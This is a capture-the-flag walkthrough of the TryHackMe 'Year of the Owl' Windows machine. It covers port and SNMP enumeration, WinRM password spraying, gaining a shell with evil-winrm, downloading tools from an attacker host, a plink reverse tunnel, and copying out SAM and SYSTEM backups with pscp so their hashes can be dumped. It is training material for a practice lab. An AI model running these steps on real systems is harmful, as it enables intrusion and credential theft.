Recon to foothold
When the labyrinth is before you and you lose your way, sometimes thinking outside the walls is the way forward
Let’s start with an nmap
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ nmap -A -T4 -p- -v 10.10.178.110
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 15:35 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating NSE at 15:35
Completed NSE at 15:35, 0.00s elapsed
Initiating Ping Scan at 15:35
Scanning 10.10.178.110 [2 ports]
Completed Ping Scan at 15:35, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.03s elapsed
Initiating Connect Scan at 15:35
Scanning 10.10.178.110 [65535 ports]
Discovered open port 3389/tcp on 10.10.178.110
Discovered open port 445/tcp on 10.10.178.110
Discovered open port 443/tcp on 10.10.178.110
Discovered open port 139/tcp on 10.10.178.110
Discovered open port 80/tcp on 10.10.178.110
Discovered open port 3306/tcp on 10.10.178.110
Connect Scan Timing: About 21.90% done; ETC: 15:37 (0:01:51 remaining)
Discovered open port 5985/tcp on 10.10.178.110
Connect Scan Timing: About 56.56% done; ETC: 15:37 (0:00:47 remaining)
Discovered open port 47001/tcp on 10.10.178.110
Completed Connect Scan at 15:37, 91.18s elapsed (65535 total ports)
Initiating Service scan at 15:37
Scanning 8 services on 10.10.178.110
Completed Service scan at 15:37, 12.75s elapsed (8 services on 1 host)
NSE: Script scanning 10.10.178.110.
Initiating NSE at 15:37
Completed NSE at 15:38, 40.08s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 7.99s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Nmap scan report for 10.10.178.110
Host is up (0.025s latency).
Not shown: 65527 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
|_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host 'ip-10-9-5-160.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2020-11-13T20:37:51+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-16T19:04:21
| Not valid after: 2021-03-18T19:04:21
| MD5: a4ad f32c 5473 eee3 2d2c ca88 c231 7879
|_SHA-1: 1824 b248 b428 857e 8ce6 f1f3 d60d 333a d679 5c5b
|_ssl-date: 2020-11-13T20:38:31+00:00; +29s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=11/13%Time=5FAEEE74%P=x86_64-pc-linux-gnu%r(N
SF:ULL,67,"c\0\0\x01\xffj\x04Host\x20'ip-10-9-5-160\.eu-west-1\.compute\.i
SF:nternal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 28s, deviation: 0s, median: 28s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-13T20:37:56
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Initiating NSE at 15:38
Completed NSE at 15:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.45 seconds
We can quickly try enumerating SMB
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ smbclient -L 10.10.178.110
Enter WORKGROUP\kali's password:
session setup failed: NT_STATUS_CONNECTION_DISCONNECTED
Ok, we’ll need credentials before we can go further there
Let’s have a look at the web page on port 80
Oh very nice indeed!
There are no comments in the text, robots.txt or sneaky scripts. Let’s use gobuster to hunt for hidden directories
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ gobuster dir --url 10.10.178.110 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.178.110
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/13 15:37:15 Starting gobuster
===============================================================
/webalizer (Status: 403)
/phpmyadmin (Status: 403)
/licenses (Status: 403)
/server-status (Status: 403)
/con (Status: 403)
/aux (Status: 403)
[ERROR] 2020/11/13 15:39:42 [!] parse http://10.10.178.110/error_log: net/url: invalid control character in URL
/prn (Status: 403)
/server-info (Status: 403)
/Con (Status: 403)
===============================================================
2020/11/13 15:42:19 Finished
===============================================================
Ok, lots of things there, but nothing we can reach, at least not for now
There is a web server on port 443 also, it appears to show the same pages. We can check the certificate though since it is https
Interesting, the cert is for localhost, that’s not a very specific hostname. Some googling finds that this is considered to be a potential security risk
localhost is a poor choice to use a development domain. There are critical bugs it introduces into an application: - Depending on the browser and the context in which that browser is running (i.e. “app mode” vs “desktop mode” vs “kiosk mode”, etc) localhost does not follow security policies in an identical manner to true domains. - Also, localhost will retain cookies, localStorage, etc that interferes with proper local development.
and
Some devices are misconfigured such that some network requests for localhost actually hit the local DNS. Not just in theory, but in practice - it has been seen in the wild. A router could have a DNS resolution for .localhost or localhost.homenetwork and depending on network settings of the router and device it could hijack the browse
Can we do something with that? Not at the moment at least!
There is an exposed mysql server on port 3306 also, let’s have a look at that
kali@kali:~$ mysql --host=10.10.178.110 -u root mysql --password=blah
ERROR 1130 (HY000): Host 'ip-10-9-5-160.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
Is there anyway we can spoof our host name to this box? It seems pretty likely that a hostname of localhost would be sufficient to get access but on a check it’s pretty clear that mysql/mariadb is just reverse looking up our IP address, no way to spoof that we’re coming from 127.0.0.1!
There’s not a lot to work with here, let’s try a UDP scan to see if we have any interesting services there to look at
kali@kali:~$ sudo nmap -sU 10.10.178.110 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 16:43 EST
Nmap scan report for 10.10.178.110
Host is up.
All 1000 scanned ports on 10.10.178.110 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 202.67 seconds
Ok, 1000 ports open|filtered, of course that doesn’t mean they’re not available, just that they don’t respond to the poke/before we move on
Let’s try a more intensive scan limited to just the top 20 or so ports for time, see if we get anything at all. From the nmap manual they are
Top 20 (most commonly open) UDP ports
- Port 631 (IPP)—Internet Printing Protocol.
- Port 161 (SNMP)—Simple Network Management Protocol.
- Port 137 (NETBIOS-NS)—One of many UDP ports for Windows services such as file and printer sharing.
- Port 123 (NTP)—Network Time Protocol.
- Port 138 (NETBIOS-DGM)—Another Windows service.
- Port 1434 (MS-SQL-DS)—Microsoft SQL Server.
- Port 445 (Microsoft-DS)—Another Windows Services port.
- Port 135 (MSRPC)—Yet Another Windows Services port.
- Port 67 (DHCPS)—Dynamic Host Configuration Protocol Server (gives out IP addresses to clients when they join the network).
- Port 53 (Domain)—Domain Name System (DNS) server.
- Port 139 (NETBIOS-SSN)—Another Windows Services port.
- Port 500 (ISAKMP)—The Internet Security Association and Key Management Protocol is used to set up IPsec VPNs.
- Port 68 (DHCPC)—DHCP client port.
- Port 520 (Route)—Routing Information Protocol (RIP).
- Port 1900 (UPNP)—Microsoft Simple Service Discovery Protocol, which enables discovery of Universal plug-and-play devices.
- Port 4500 (nat-t-ike)—For negotiating Network Address Translation traversal while initiating IPsec connections (during Internet Key Exchange).
- Port 514 (Syslog)—The standard UNIX log daemon.
- Port 49152 (Varies)—The first of the IANA-specified dynamic/private ports. No official ports may be registered from here up until the end of the port range (65536). Some systems use this range for their ephemeral ports, so services which bind a port without requesting a specific number are often allocated 49152 if they are the first program to do so.
- Port 162 (SNMPTrap)—Simple Network Management Protocol trap port (An SNMP agent typically uses 161 while an SNMP manager typically uses 162).
- Port 69 (TFTP)—Trivial File Transfer Protocol.
Let’s go for it
kali@kali:~$ sudo nmap -sU 10.10.178.110 -Pn --top-ports 20 -A -v
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-13 17:00 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:00
Completed Parallel DNS resolution of 1 host. at 17:00, 0.01s elapsed
Initiating UDP Scan at 17:00
Scanning 10.10.178.110 [20 ports]
Completed UDP Scan at 17:00, 5.14s elapsed (20 total ports)
Initiating Service scan at 17:00
Scanning 20 services on 10.10.178.110
Service scan Timing: About 5.00% done; ETC: 17:32 (0:30:43 remaining)
Completed Service scan at 17:01, 102.63s elapsed (20 services on 1 host)
Initiating OS detection (try #1) against 10.10.178.110
Retrying OS detection (try #2) against 10.10.178.110
Initiating Traceroute at 17:02
Completed Traceroute at 17:02, 9.05s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:02
Completed Parallel DNS resolution of 1 host. at 17:02, 0.01s elapsed
NSE: Script scanning 10.10.178.110.
Initiating NSE at 17:02
Completed NSE at 17:07, 320.54s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 2.31s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Nmap scan report for 10.10.178.110
Host is up.
PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Too many fingerprints match this host to give specific OS details
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 3.98 ms 10.9.0.1
2 ... 30
NSE: Script Post-scanning.
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Initiating NSE at 17:07
Completed NSE at 17:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 449.81 seconds
Raw packets sent: 176 (12.377KB) | Rcvd: 1 (56B)
Being curious about the Rcvd: 1 we can watch the whole scan in wireshark, turns out the one received packet isn’t even from the scanned host, rather it’s from the router @ 10.9.0.1 giving us a ‘Type: 11 (Time-to-live exceeded)’ error after the host is pinged
We try probing those top-20 ports individually with the various enumeration tools that exist and eventually we find something!!
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt 10.10.250.206
Scanning 1 hosts, 3219 communities
10.10.250.206 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Ok, it seems that SNMP is open on port 161 with the community string openview
Foothold to user
Alright then, let’s see what we can see now that we have a foothold
We can use snmp-check to gather some data from the target
kali@kali:~$ snmp-check -c openview 10.10.250.206
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.250.206:161 using SNMPv1 and community 'openview'
[*] System information:
Host IP address : 10.10.250.206
Hostname : year-of-the-owl
Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Contact : -
Location : -
Uptime snmp : 01:11:41.92
Uptime system : 01:11:08.56
System date : 2020-11-14 15:22:40.6
Domain : WORKGROUP
[*] User accounts:
Guest
Jareth
Administrator
DefaultAccount
WDAGUtilityAccount
[*] Network information:
IP forwarding enabled : no
Default TTL : 128
TCP segments received : 128
TCP segments sent : 348
TCP segments retrans : 500
Input datagrams : 13425
Delivered datagrams : 12601
Output datagrams : 3208
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
--snip--
[*] Network IP:
Id IP Address Netmask Broadcast
7 10.10.250.206 255.255.0.0 1
1 127.0.0.1 255.0.0.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.0.1 0.0.0.0 25
10.10.0.0 10.10.250.206 255.255.0.0 281
10.10.250.206 10.10.250.206 255.255.255.255 281
10.10.255.255 10.10.250.206 255.255.255.255 281
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
169.254.169.123 10.10.0.1 255.255.255.255 50
169.254.169.249 10.10.0.1 255.255.255.255 50
169.254.169.250 10.10.0.1 255.255.255.255 50
169.254.169.251 10.10.0.1 255.255.255.255 50
169.254.169.253 10.10.0.1 255.255.255.255 50
169.254.169.254 10.10.0.1 255.255.255.255 50
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 3389 0.0.0.0 0 listen
0.0.0.0 5985 0.0.0.0 0 listen
0.0.0.0 47001 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49670 0.0.0.0 0 listen
10.10.250.206 139 0.0.0.0 0 listen
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 3389
0.0.0.0 5353
0.0.0.0 5355
10.10.250.206 137
10.10.250.206 138
127.0.0.1 61529
[*] Network services:
Index Name
0 Power
1 mysql
2 Server
3 Themes
--snip--
67 Remote Desktop Services UserMode Port Redirector
68 Windows Defender Antivirus Network Inspection Service
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
68 running Registry
408 running smss.exe
492 running dwm.exe
--snip--
2980 running conhost.exe \??\C:\Windows\system32\ 0x4
3008 running httpd.exe C:\xampp\apache\bin\ -d C:/xampp/apache
3556 running CompatTelRunner.exe C:\Windows\system32\ -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:t1ZwsJvflU6MCw0+.2
3656 running NisSrv.exe
[*] Storage information:
Description : ["C:\\ Label: Serial Number 7c0c3814"]
Device id : [#<SNMP::Integer:0x000055ae1efbf640 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055ae1efbd7a0 @value=4096>]
Memory size : 19.46 GB
Memory used : 15.19 GB
Description : ["Virtual Memory"]
Device id : [#<SNMP::Integer:0x000055ae1efa80a8 @value=2>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055ae1efa6280 @value=65536>]
Memory size : 3.12 GB
Memory used : 1.18 GB
Description : ["Physical Memory"]
Device id : [#<SNMP::Integer:0x000055ae1f034af8 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055ae1f032ca8 @value=65536>]
Memory size : 2.00 GB
Memory used : 1.24 GB
[*] File system information:
Index : 1
Mount point :
Remote mount point : -
Access : 1
Bootable : 0
[*] Device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Unknown Processor Type
4 unknown unknown Software Loopback Interface 1
5 unknown unknown Microsoft 6to4 Adapter
6 unknown unknown Microsoft IP-HTTPS Platform Adapter
7 unknown unknown Microsoft Kernel Debug Network Adapter
8 unknown unknown Intel(R) 82574L Gigabit Network Connection
9 unknown unknown Microsoft Teredo Tunneling Adapter
10 unknown unknown AWS PV Network Device #0
11 unknown unknown AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
12 unknown unknown AWS PV Network Device #0-QoS Packet Scheduler-0000
13 unknown unknown AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
14 unknown running Fixed Disk
15 unknown running Fixed Disk
16 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
17 unknown unknown COM1:
[*] Software components:
Index Name
1 XAMPP
2 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
3 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
4 Amazon SSM Agent
5 Amazon SSM Agent
6 Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325
Ok, so we can confirm that it is a Windows host and we get a username Jareth
Let’s try using crackmapexec to find a password for this user then
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ crackmapexec winrm 10.10.250.206 -u 'Jareth' -p '/usr/share/wordlists/rockyou.txt'
WINRM 10.10.250.206 5985 NONE [*] http://10.10.250.206:5985/wsman
WINRM 10.10.250.206 5985 NONE [-] None\Jareth:123456 "Failed to authenticate the user Jareth with ntlm"
--snip--
WINRM 10.10.250.206 5985 NONE [+] None\Jareth:sarah (Pwn3d!)
Excellent, we have creds! Jareth:sarah
Let’s try these now in RDP
Ahh, it seems that Jareth doesn’t have the right to log in remotely! We have another possibility though, let’s see if evil-winrm can get us a shell
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ ~/Tools/evil-winrm/evil-winrm.rb -u Jareth -p sarah -i 10.10.250.206
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
*Evil-WinRM* PS C:\Users\Jareth\Documents>
Excellent, we’re in!
Let’s look in the usual place for a user flag
*Evil-WinRM* PS C:\Users\Jareth\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Jareth\Desktop> dir
Directory: C:\Users\Jareth\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:21 AM 80 user.txt
*Evil-WinRM* PS C:\Users\Jareth\Desktop> type user.txt
THM{REDACTED}
And we got it, #1:THM{REDACTED}
Privilege Escalation
Let’s pull winPEAS onto the target using Invoke-WebRequest
*Evil-WinRM* PS C:\Users\Jareth\Desktop> Invoke-WebRequest -uri "http://10.9.5.160:8888/winPEAS.bat" -OutFile "C:\Users\Jareth\Desktop\winPEAS.bat"
Picking out the interesting bits …as far as we know! 😄
- It seems UAC is on
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] UAC Settings <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
- We don’t seem to have much by the way of useful privileges
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
- We’re in the
Remote Management Usersgroup, what does that allow us to do?
Local Group Memberships *Remote Management Use*Users
Ahh, I think this might be the reason that we were able to get a shell via WinRM
- There is a ‘utility’ account that might be worth exploring
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] USERS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Jareth WDAGUtilityAccount
On a quick google this account is a normal built-in that is used by the system for
Windows Defender Application Guard scenarios
- There doesn’t appear to be any creds accessible apart from the user we already have
We can try connecting to the mysql service now that we have a localhost connection. For this we need to
- Make a proxy connection that maps a port remotely to the internal port 3306
- Run
mysqlvs. that local port
To do the first part of this we’ll use this Red Teamer’s guide. First we make a user sshproxy on our attack box then upload the command line SSH client plink from the putty suite and run it with the -R switch to create a remote proxy port
*Evil-WinRM* PS C:\Users\Jareth\Desktop> iwr -uri "http://10.9.5.160:8888/plink.exe" -outfile "plink.exe"
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\plink.exe sshproxy@10.9.5.160 -R 43306:localhost:3306
plink.exe : The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is.The server's ssh-ed25519 key fingerprint is:ssh-ed25519 255 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b🆎04:68If you trust this host, enter "y" to add the key toPuTTY's cache and carry on connecting.If you want to carry on connecting just once, withoutadding the key to the cache, enter "n".If you do not trust this host, press Return to abandon theconnection.Store key in cache? (y/n) Connection abandoned.
Ok, so we’re not getting an opportunity to accept the host key, let’s specify it directly on the commandline
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\plink.exe sshproxy@10.9.5.160 -R 43306:localhost:3306 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b🆎04:68 -pw sshproxy
plink.exe : Using username "sshproxy".
+ CategoryInfo : NotSpecified: (Using username "sshproxy".:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Linux kali 5.8.0-kali3-amd64 #1 SMP Debian 5.8.14-1kali1 (2020-10-13) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 15 10:53:41 2020 from 10.9.5.160
*Evil-WinRM* PS C:\Users\Jareth\Desktop>
Ok, now we get in but the connection disconnects immediately, possibily because we set up sshproxy to have no shell. Let’s try one more time with the -N parameter
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\plink.exe sshproxy@10.9.5.160 -R 43306:localhost:3306 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b🆎04:68 -pw sshproxy -N
plink.exe : Using username "sshproxy".
+ CategoryInfo : NotSpecified: (Using username "sshproxy".:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Ok… that’s sort of hanging there, can we see an open port 43306 on the attack box?
kali@kali:~/Tools/putty$ sudo netstat -tulnp | grep 43306
tcp 0 0 127.0.0.1:43306 0.0.0.0:* LISTEN 256391/sshd: sshpro
tcp6 0 0 ::1:43306 :::* LISTEN 256391/sshd: sshpro
Excellent, now let’s try to connect with mysql. We have to specify --protocol TCP as the default for mysql connecting on localhost is to use a .sock file
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ mysql -u jareth -p -h localhost -P 43306 --protocol TCP
Enter password:
ERROR 1045 (28000): Access denied for user 'jareth'@'localhost' (using password: YES)
Ok, we have no connection for Jareth with the known creds
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ mysql -u root -p -h localhost -P 43306 --protocol TCP
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ mysql -u root -p -h localhost -P 43306 --protocol TCP
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Similarly we cannot get in as root either when trying the default (no password) or sarah (in case of password reuse)
Let’s have a look in the Recycle Bin and see if there are any interesting files the user may have deleted
We can find the recycle bin in the drive root
*Evil-WinRM* PS C:\> dir -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 2:14 AM $Recycle.Bin
d--hsl 9/17/2020 7:27 PM Documents and Settings
d----- 9/18/2020 2:04 AM PerfLogs
d-r--- 9/17/2020 7:39 PM Program Files
d----- 9/17/2020 7:39 PM Program Files (x86)
d--h-- 9/18/2020 2:04 AM ProgramData
d--hs- 9/17/2020 7:27 PM Recovery
d--hs- 9/17/2020 7:26 PM System Volume Information
d-r--- 9/18/2020 2:14 AM Users
d----- 11/13/2020 10:33 PM Windows
d----- 9/17/2020 8:18 PM xampp
-a-hs- 11/16/2020 8:56 PM 1207959552 pagefile.sys
To cd into it we must put the ‘$’ in quotes
*Evil-WinRM* PS C:\> cd c:\"$"Recycle.Bin
*Evil-WinRM* PS C:\$Recycle.Bin> dir -Force
Directory: C:\$Recycle.Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 7:28 PM S-1-5-21-1987495829-1628902820-919763334-1001
d--hs- 11/13/2020 10:41 PM S-1-5-21-1987495829-1628902820-919763334-500
Now we can go into the user folder under here, we don’t have access to ‘…-500’, that’s probably the Administrator account, but we can access ‘…-1001’
*Evil-WinRM* PS C:\$Recycle.Bin> cd S-1-5-21-1987495829-1628902820-919763334-1001
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> dir -force
Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 9/18/2020 2:14 AM 129 desktop.ini
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
Ok, we find a SAM backup file, and another interesting backup for system, these should/could contain creds for us so let’s grab them both. We’ll use pscp from the putty suite for this
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\pscp -P 22 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b🆎04:68 -pw ********* sam.bak kali@10.9.5.160:/home/kali/Documents/TryHackMe/YearOfTheOwl/.
sam.bak | 4 kB | 4.0 kB/s | ETA: 00:00:11 | 8%
sam.bak | 48 kB | 48.0 kB/s | ETA: 00:00:00 | 100%
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\pscp -P 22 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b🆎04:68 -pw ********* system.bak kali@10.9.5.160:/home/kali/Documents/TryHackMe/YearOfTheOwl/.
system.bak | 4 kB | 4.0 kB/s | ETA: 01:11:01 | 0%
system.bak | 352 kB | 352.0 kB/s | ETA: 00:00:47 | 2%
system.bak | 7624 kB | 3812.0 kB/s | ETA: 00:00:02 | 44%
system.bak | 17048 kB | 8524.0 kB/s | ETA: 00:00:00 | 100%
Now we can use impacket’s secretsdump.py to dump the local SAM hashes
kali@kali:~/Tools/impacket/examples$ ./secretsdump.py -sam ~/Documents/TryHackMe/YearOfTheOwl/sam.bak -system ~/Documents/TryHackMe/YearOfTheOwl/system.bak LOCAL
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
